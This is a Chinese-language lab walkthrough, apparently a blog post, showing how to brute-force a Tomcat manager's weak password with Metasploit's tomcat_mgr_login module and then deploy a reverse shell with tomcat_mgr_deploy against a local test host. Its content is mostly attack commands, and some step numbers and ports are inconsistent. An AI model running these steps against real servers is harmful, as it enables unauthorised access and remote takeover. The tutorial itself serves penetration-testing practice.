Metasploit爆破Tomcat弱口令

Metasploit爆破Tomcat弱口令

0x00 tomcat 爆破

  1. nmap 扫描主机 【依然本地搭建的】执行命令 nmap –sV 192.168.6.16

可以发现8080端口开着tomcat

  1. kali终端中输入命令“msfconsole”,启动MSF终端。

  1. 在msf终端下输入命令“search tomcat”, 搜索tomcat的相关工具和攻击载荷

  1. 在终端输入“use auxiliary/scanner/http/tomcat_mgr_login”, 启用漏洞利用模块, 提示符就会提示进入到该路径下

  2. 在终端输入“show options ” 查看需要配置的参数

  3. 终端下输入“set RHOSTS 192.168.6.16”,设置攻击目标主机IP

    终端下输入“set RPORT 8180”,设置攻击目标主机端口号

  1. 终端下输入“exploit”, 实施攻击

账户密码都是tomcat

  • 0x01 反弹shell,建立会话
  1. 终端下输入“use exploit/multi/http/tomcat_mgr_deploy”

  1. 终端下输入“set RHOST 192.168.6.16”,设置攻击的目标主机IP
    终端下输入“set RPORT 8080”,设置攻击目标主机端口号

  2. 终端下输入“set username tomcat”,设置攻击时使用的登录账号tomcat
    终端下输入“set password tomcat”,设置攻击时使用的密码tomcat

  3. run 开始攻击